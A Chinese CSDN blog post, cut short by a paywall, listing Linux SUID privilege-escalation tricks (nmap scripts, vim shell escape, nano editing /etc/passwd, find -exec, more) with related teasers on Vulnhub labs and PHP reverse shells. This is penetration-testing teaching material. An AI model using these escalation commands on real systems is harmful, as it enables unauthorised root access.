【渗透测试】--- suid提权

最新推荐文章于 2025-04-11 22:30:54 发布
最新推荐文章于 2025-04-11 22:30:54 发布
阅读量959 收藏 3
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43168364/article/details/112554274
版权
本文介绍了在渗透测试中如何利用具有suid权限的命令进行提权,包括nmap、vim、nano、find、bash、more、less、cp、awk和man等,详细阐述了每个命令的提权方法和执行命令示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

可以用suid来提取的命令(前提是这些命令设置了suid权限)

  • nmap
  • vim
  • nano
  • find
  • bash
  • more
  • less
  • cp
  • awk
  • man

1.nmap

  • 执行:nmap --script=exe.nse,脚本中的内容写:os.execute("/bin/bash")

2.vim

  • 进入vim的编辑模式,执行::set shell=/bin/bash ; :shell

3.nano

  • 执行:nano /etc/passwd , 即可添加root用户

4.find

  • 执行:find /tmp -name * -exec whoami \; 利用find命令的-exec选项来以root身份执行任意命令

5.more

  • 执行:more /etc/passwd ; !/bin/bash

6.less

  • 执行:less /etc/passwd ;
最低0.47元/天 解锁文章
SUID
snowlyzz的博客
08-14 1901
久经不衰的SUID
渗透测试-KioptrixVM3靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-02 2499
1.环境部署 靶机下载地址:https://download.vulnhub.com/kioptrix/KVM3.rar 攻击机:Kali 2019.2 amd64 靶机 : KioptrixVM3靶机 目标:拿下靶机root限 2.信息收集 使用arp-scan -l进行局域网主机发现 得到靶机IP地址,使用Nmap进行端口扫描 nmap -sV 192.168.227.13...
SUID
一只web狗
07-01 1万+
SUID介绍
LinuxSUID
最新发布
2201_75556043的博客
04-11 871
简单讲述了SUID过程以及部分演示
[内网渗透]SUID
leekos的博客,分享web安全相关知识~
07-28 940
suid(set uid)是linux中的一种特殊限,suid可以让调用者以文件拥有者身份运行该文件,所以利用suid的核心就是运行root用户所拥有的suid的文件,那么运行该文件的时候就得获得root用户的身份了。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义在执行过程中,调用者会暂时获得该文件的属主限,且该限只在程序执行的过程中有效。通俗的来讲,假设我们现在有一个可执行文件/bin/find,其属主为root。当我们通过非root用户登录时,如果。
Linux下用SUID
热门推荐
谢公子的博客
12-07 2万+
关于SUID详细:Linux下的用户、组和SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来的linux可行性的文件列表如下: nmap vim find bash more less nano cp 以下命令可以发现系统上运行...
linux系统suid
focus on security
05-19 5813
SUID 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊限,其功能为用户运行某个程序时,如果该程序有SUID限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者限,且该限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令)
qq_45722813的博客
12-10 4449
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令) 靶机下载地址:https://www.vulnhub.com/entry/dc-8,367/ 将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机 使用nmap进行主机发现,获取靶机IP地址,命令nmap -Pn 192.168.172.1/24 再使用nmap扫描靶机操作系统,开放端口和对应服务等 靶机开放22端口对应ssh服务,80端口对应http服务,这也是一个drupal的网页
渗透测试kali Liunx渗透DC-3
2301_76976211的博客
10-08 739
由于我们前面采用nmap进行扫描时我们已经发现了中间件为joomla,我们可以采用joomscan进行扫描,如果我们不知道是joomla,我们可以采用目录扫描或者nikto等扫描工具进行扫描。进入到后台存放木马的位置http://192.168.232.134/templates/beez3/html/shell.php刷新他。kali的反弹链接木马在 /usr/share/webshells/php/php-reverse-shell.php的里面。把$ip 改成自己kali的ip。
Vulnhub靶场渗透测试系列DC-5(screen)
qq_45722813的博客
11-23 2962
Vulnhub靶场渗透测试系列DC-5 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 攻击机为kali2021,IP地址:192.168.172.131 下载好靶机导入VMware虚拟机,将网络模式设置为NAT模式,然后开启虚拟机 使用命令nmap -T4 -Pn 192.168.172.1/24进行主机发现,获取靶机的IP地址 使用命令nmap -T4 -A -p- 192.168.172.139扫描靶机的操作系统,开放端口和对应的服务使用的中间件等信息
Linux SUID
她叫常玉莹
08-28 1935
概述findNmaplessbashvim 概述 SUID是Linux的一种限机制,具有这种限的文件会在其执行时,使调用者暂时获得该文件拥有者的限,如果拥有SUID限,那么就可以利用系统中的二进制文件和工具进行root。 目前可以用来的Linux可执行文件列表 nmap vim find bash more less nano cp 用于查找SUID命令可执行文件的命令 find / -perm -u=s -type f 2>/dev/null find / -user roo..
Linux之SUID
Zlirving_的博客
08-25 899
0x00 SUID是什么? SUID其实和文件或目录的基本属性一样(r w x) ,当一个可执du行的文件(命令)拥有SUID时,x就变成s了,你试下:ll /usr/bin/passwd 就知道,意思就是当你执行这个命令时暂时拥有passwd的拥有者的限,也就是root   0x01 suid 运行某些程序时暂时获得root的限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来的:(三种都可以) find / -perm -u=s -type f 2>/
LinuxSUID
weixin_51692662的博客
08-22 2211
linuxsuid
suid(linux)
weixin_68652890的博客
04-15 1106
suid suid(设置用户的id)是Linux中的一种特殊限,当运行具有suid限的二进制文件的时候,使得调用者暂时获得该文件拥有者的限(比如a文件拥有者是root,且被赋予了s限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root限) 除了经常看见的rwx限还有s限 s限,设置使文件在执行阶段具有文件所有者的限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s限,就被称为Set UID,简称为SUID的特殊限。简称为SUID的特殊
网安学途—SUID教程
星虐
11-18 1959
本文介绍了SUID的基本概念、如何设置SUID限,以及常见的具有SUID限的二进制可执行文件(如nmap、vim、find、bash等)。此外,文章详细阐述了如何利用这些文件进行操作,包括使用find、nmap、more、less、bash、vim、awk和cp等命令的具体方法。最后,文章还对比了/bin/bash和/bin/sh的区别,指出Bash功能更强大,而/bin/sh可能是Bash或其他Shell的符号链接。
简谈SUID
2401_84466336的博客
05-28 1399
SUID (Set UID)是Linux中的一种特殊限,其功能为用户运行某个程序时,如果该程序有SUID限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程中,调用者会暂时获得该文件的所有者限,且该限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值